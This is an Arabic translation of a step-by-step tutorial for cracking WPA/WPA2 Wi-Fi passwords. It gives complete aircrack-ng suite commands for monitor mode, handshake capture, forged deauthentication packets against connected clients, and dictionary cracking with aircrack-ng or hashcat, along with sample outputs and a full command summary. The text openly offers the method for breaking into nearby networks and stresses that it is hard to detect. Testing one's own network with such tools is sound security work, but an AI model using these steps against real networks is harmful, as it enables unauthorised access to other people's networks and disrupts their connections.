
اختراق أجهزة توجيه Wi-Fi WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat
اختراق أجهزة التوجيه (الراوترات) التي تعمل ببروتوكول WPA/WPA2 باستخدام Airodump-ng و Aircrack-ng/Hashcat.
هذا دليل إرشادي موجز يوضح كيفية اختراق شبكات Wi-Fi المحمية بكلمات مرور ضعيفة. إنه ليس شاملاً، لكنه ينبغي أن يوفر معلومات كافية لك لاختبار أمان شبكتك الخاصة أو اقتحام شبكة قريبة. الهجوم الموضح أدناه هو هجوم سلبي بالكامل (استماع فقط، لا يتم بث أي شيء من حاسوبك) ومن المستحيل اكتشافه بشرط ألا تستخدم كلمة المرور التي تخترقها. يمكن استخدام هجوم إلغاء المصادقة النشط الاختياري لتسريع عملية الاستطلاع، وهو موضح في نهاية هذا المستند.
إذا كنت على دراية بهذه العملية، يمكنك تخطي الشروحات والانتقال إلى قائمة الأوامر المستخدمة في الأسفل. للحصول على مجموعة من الاقتراحات والطرق البديلة، راجع الملحق. قام كل من neal1991 و tiiime بتقديم ترجمات لهذا المستند و الملحق باللغة الصينية إذا كنت تفضل تلك النسخ.
إخلاء مسؤولية: هذا البرنامج/الدليل هو لأغراض تعليمية فقط. لا ينبغي استخدامه في أنشطة غير قانونية. المؤلف غير مسؤول عن استخدامه. لا تكن وغداً.
يفترض هذا الدليل أنك:
sudo apt-get install aircrack-ngابدأ بإدراج الواجهات اللاسلكية التي تدعم وضع المراقبة باستخدام:
airmon-ng
إذا لم ترَ واجهة مدرجة، فإن بطاقتك اللاسلكية لا تدعم وضع المراقبة 😞
سنفترض أن اسم واجهتك اللاسلكية هو wlan0 لكن تأكد من استخدام الاسم الصحيح إذا كان مختلفاً عن هذا. بعد ذلك، سنضع الواجهة في وضع المراقبة:
airmon-ng start wlan0
قم بتشغيل iwconfig. يجب أن ترى الآن واجهة وضع مراقبة جديدة مدرجة (على الأرجح mon0 أو wlan0mon).
ابدأ الاستماع إلى إطارات Beacon 802.11 التي تبثها أجهزة التوجيه اللاسلكية القريبة باستخدام واجهة المراقبة الخاصة بك:
airodump-ng mon0
يجب أن ترى مخرجات مشابهة لما يلي.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
لأغراض هذا العرض التوضيحي، سنختار اختراق كلمة مرور شبكتي "hackme". احفظ عنوان BSSID MAC ورقم القناة (CH) كما يظهره airodump-ng، لأننا سنحتاجهما في الخطوة التالية.
يستخدم WPA/WPA2 مصافحة رباعية لمصادقة الأجهزة على الشبكة. ليس عليك معرفة أي شيء عن معنى ذلك، لكن يجب عليك التقاط إحدى هذه المصافحات لكسر كلمة مرور الشبكة. تحدث هذه المصافحات عندما يتصل جهاز بالشبكة، على سبيل المثال، عندما يعود جارك من العمل إلى المنزل. نلتقط هذه المصافحة بتوجيه airmon-ng لمراقبة حركة المرور على الشبكة المستهدفة باستخدام قيم القناة و bssid التي تم اكتشافها من الأمر السابق.
# استبدل قيم -c و --bssid بقيم شبكتك المستهدفة
# -w تحدد الدليل حيث سنحفظ التقاط الحزم
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
الآن ننتظر... بمجرد التقاط مصافحة، يجب أن ترى شيئاً مثل [ WPA handshake: bc:d3:c9:ef:d2:67 في أعلى يمين الشاشة، مباشرة على يمين الوقت الحالي.
إذا كنت تشعر بنفاد الصبر، وتشعر بالراحة تجاه استخدام هجوم نشط، يمكنك إجبار الأجهزة المتصلة بالشبكة المستهدفة على إعادة الاتصال، عن طريق إرسال حزم إلغاء مصادقة خبيثة إليها. يؤدي هذا غالباً إلى التقاط مصافحة رباعية. راجع قسم هجوم إلغاء المصادقة أدناه للحصول على معلومات حول هذا.
بمجرد التقاط المصافحة، اضغط ctrl-c للخروج من airodump-ng. يجب أن ترى ملف .cap حيثما أخبرت airodump-ng بحفظ الالتقاط (غالباً ما يسمى -01.cap). سنستخدم ملف الالتقاط هذا لاختراق كلمة مرور الشبكة. أحب إعادة تسمية هذا الملف ليعكس اسم الشبكة التي نحاول اختراقها:
mv ./-01.cap hackme.cap
الخطوة الأخيرة هي اختراق كلمة المرور باستخدام المصافحة التي تم التقاطها. إذا كان لديك إمكانية الوصول إلى وحدة معالجة رسوميات (GPU)، فإنني أوصي بشدة باستخدام hashcat لاختراق كلمة المرور. لقد أنشأت أداة بسيطة تجعل استخدام hashcat سهلاً للغاية تسمى naive-hashcat. إذا لم يكن لديك إمكانية الوصول إلى GPU، فهناك العديد من خدمات اختراق GPU عبر الإنترنت التي يمكنك استخدامها، مثل GPUHASH.me أو OnlineHashCrack. يمكنك أيضاً تجربة اختراق باستخدام وحدة المعالجة المركزية (CPU) باستخدام Aircrack-ng.
ضع في اعتبارك أن كلتا طريقتي الهجوم أدناه تفترضان كلمة مرور ضعيفة نسبياً يولدها المستخدم. تأتي معظم أجهزة التوجيه WPA/WPA2 بكلمات مرور عشوائية قوية مكونة من 12 حرفاً يتركها العديد من المستخدمين (بحق) دون تغيير. إذا كنت تحاول اختراق إحدى كلمات المرور هذه، فإنني أوصي باستخدام ملفات قاموس Probable-Wordlists WPA-length.
naive-hashcat (موصى به)قبل أن نتمكن من اختراق كلمة المرور باستخدام naive-hashcat، نحتاج إلى تحويل ملف .cap الخاص بنا إلى تنسيق ملف hashcat المكافئ .hccapx. يمكنك القيام بذلك بسهولة إما عن طريق رفع ملف .cap إلى https://hashcat.net/cap2hccapx/ أو باستخدام أداة cap2hccapx مباشرة.
cap2hccapx.bin hackme.cap hackme.hccapx
بعد ذلك، قم بتنزيل وتشغيل naive-hashcat:
# تحميل
git clone https://github.com/brannondorsey/naive-hashcat
cd naive-hashcat
# تحميل ملف القاموس rockyou بحجم 134 ميجابايت
curl -L -o dicts/rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# اختراق ! هيا ! اختراق !
# 2500 هو وضع تجزئة hashcat لشبكات WPA/WPA2
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
يستخدم Naive-hashcat هجمات مختلفة مثل القاموس، و القاعدة، و التجميع، و القناع (القوة الغاشمة الذكية) ويمكن أن يستغرق أياماً أو حتى أشهراً لمواجهة كلمات المرور متوسطة القوة. سيتم حفظ كلمة المرور المخترقة في hackme.pot، لذا تحقق من هذا الملف بشكل دوري. بمجرد اختراق كلمة المرور، يجب أن ترى شيئاً مثل هذا كمحتويات POT_FILE الخاص بك:
e30a5a57fc00211fc9f57a4491508cc3:9c5c8ec9abc0:acd1b8dfd971:ASUS:hacktheplanet
حيث الحقلان الأخيران المفصولان بـ : هما اسم الشبكة وكلمة المرور على التوالي.
إذا كنت ترغب في استخدام hashcat بدون naive-hashcat، راجع هذه الصفحة للحصول على معلومات.
يمكن استخدام Aircrack-ng لهجمات القاموس الأساسية جداً التي تعمل على وحدة المعالجة المركزية (CPU) الخاصة بك. قبل تشغيل الهجوم، تحتاج إلى قائمة كلمات. أوصي باستخدام ملف القاموس rockyou الشهير:
# تحميل ملف القاموس rockyou بحجم 134 ميجابايت
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
ملاحظة، إذا لم تكن كلمة مرور الشبكة موجودة في ملف الكلمات، فلن تتمكن من اختراق كلمة المرور.
# -a2 يحدد WPA2، -b هو BSSID، -w هو ملف الكلمات
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt hackme.cap
إذا تم اختراق كلمة المرور، فسترى رسالة KEY FOUND! في الطرفية متبوعة بنسخة النص العادي لكلمة مرور الشبكة.
Aircrack-ng 1.2 beta3
[00:01:49] 111040 keys tested (1017.96 k/s)
KEY FOUND! [ hacktheplanet ]
Master Key : A1 90 16 62 6C B3 E2 DB BB D1 79 CB 75 D2 C7 89
59 4A C9 04 67 10 66 C5 97 83 7B C3 DA 6C 29 2E
Transient Key : CB 5A F8 CE 62 B2 1B F7 6F 50 C0 25 62 E9 5D 71
2F 1A 26 34 DD 9F 61 F7 68 85 CC BC 0F 88 88 73
6F CB 3F CC 06 0C 06 08 ED DF EC 3C D3 42 5D 78
8D EC 0C EA D2 BC 8A E2 D7 D3 A2 7F 9F 1A D3 21
EAPOL HMAC : 9F C6 51 57 D3 FA 99 11 9D 17 12 BA B6 DB 06 B4
يقوم هجوم إلغاء المصادقة بإرسال حزم إلغاء مصادقة مزورة من جهازك إلى عميل متصل بالشبكة التي تحاول اختراقها. تتضمن هذه الحزم عناوين "مرسل" مزيفة تجعلها تبدو للعميل كما لو تم إرسالها من نقطة الوصول نفسها. عند استلام مثل هذه الحزم، يقطع معظم العملاء اتصالهم بالشبكة ويعيدون الاتصال فوراً، مما يوفر لك مصافحة رباعية إذا كنت تستمع باستخدام airodump-ng.
استخدم airodump-ng لمراقبة نقطة وصول محددة (باستخدام -c channel --bssid MAC) حتى ترى عميلاً (STATION) متصلاً. يبدو العميل المتصل شيئاً مثل هذا، حيث 64:BC:0C:48:97:F7 هو MAC العميل.
CH 6 ][ Elapsed: 2 mins ][ 2017-07-23 19:15 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -19 75 1043 144 10 6 54e WPA2 CCMP PSK ASUS
BSSID STATION PWR Rate Lost Frames Probe
9C:5C:8E:C9:AB:C0 64:BC:0C:48:97:F7 -37 1e- 1e 4 6479 ASUS
الآن، اترك airodump-ng قيد التشغيل وافتح نافذة طرفية جديدة. سنستخدم أمر aireplay-ng لإرسال حزم إلغاء مصادقة مزورة إلى عميلنا الضحية، مما يجبره على إعادة الاتصال بالشبكة ونأمل في الحصول على المصافحة أثناء هذه العملية.
# -0 2 يحدد أننا نود إرسال حزمتي إلغاء مصادقة. قم بزيادة هذا الرقم
# إذا لزم الأمر مع خطر مقاطعة نشاط شبكة العميل بشكل ملحوظ
# -a هو MAC نقطة الوصول
# -c هو MAC العميل
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
يمكنك اختيارياً بث حزم إلغاء المصادقة إلى جميع العملاء المتصلين باستخدام:
# ليس كل العملاء يحترمون بث إلغاء المصادقة رغم ذلك
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 mon0
بمجرد إرسال حزم إلغاء المصادقة، عد إلى عملية airodump-ng الخاصة بك، ومع الحظ يجب أن ترى الآن شيئاً مثل هذا في أعلى اليمين: [ WPA handshake: 9C:5C:8E:C9:AB:C0. الآن بعد أن التقطت مصافحة، يجب أن تكون مستعداً لاختراق كلمة مرور الشبكة.
فيما يلي قائمة بجميع الأوامر اللازمة لاختراق شبكة WPA/WPA2، بالترتيب، مع شرح بسيط.
# ضع جهاز الشبكة الخاص بك في وضع المراقبة
airmon-ng start wlan0
# استمع لجميع إطارات beacon القريبة للحصول على BSSID وقناة الهدف
airodump-ng mon0
# ابدأ الاستماع للمصافحة
airodump-ng -c 6 --bssid 9C:5C:8E:C9:AB:C0 -w capture/ mon0
# اختيارياً، قم بإلغاء مصادقة عميل متصل لفرض المصافحة
aireplay-ng -0 2 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0
########## اختراق كلمة المرور باستخدام aircrack-ng... ##########
# قم بتحميل ملف القاموس rockyou.txt بحجم 134 ميجابايت إذا لزم الأمر
curl -L -o rockyou.txt https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt
# اختراق باستخدام aircrack-ng
aircrack-ng -a2 -b 9C:5C:8E:C9:AB:C0 -w rockyou.txt capture/-01.cap
########## أو اختراق كلمة المرور باستخدام naive-hashcat ##########
# تحويل cap إلى hccapx
cap2hccapx.bin capture/-01.cap capture/-01.hccapx
# اختراق باستخدام naive-hashcat
HASH_FILE=hackme.hccapx POT_FILE=hackme.pot HASH_TYPE=2500 ./naive-hashcat.sh
كانت الاستجابة لهذا الدليل كبيرة جداً لدرجة أنني أضفت اقتراحات ومواد إضافية من أعضاء المجتمع كـ ملحق. اطلع عليه لتعلم كيفية:
wlandump-ngcrunch لتوليد قوائم كلمات تتجاوز 100 جيجابايت أثناء التشغيلmacchangerيتوفر أيضاً نسخة صينية من الملحق.
تم استخلاص الكثير من المعلومات المقدمة هنا من الدليل الرائع لويس إينكارناسيون. شكراً أيضاً للمؤلفين والمشرفين الرائعين الذين يعملون على Aircrack-ng و Hashcat.
شكر جزيل لـ neal1991 و tiiime لترجمة هذا الدليل إلى الصينية. وشكر إضافي لـ yizhiheng، hiteshnayak305، enilfodne، DrinkMoreCodeMore، hivie7510، cprogrammer1994، 0XE4، hartzell، zeeshanu، flennic، bhusang، tversteeg، gpetrousov، crowchirp و Shark0der الذين قدموا أيضاً اقتراحات وإصلاحات للأخطاء المطبعية على Reddit و GitHub. إذا كنت مهتماً بسماع بعض البدائل المقترحة لـ WPA2، تحقق من بعض النقاشات الرائعة على هذا المنشور على Hacker News.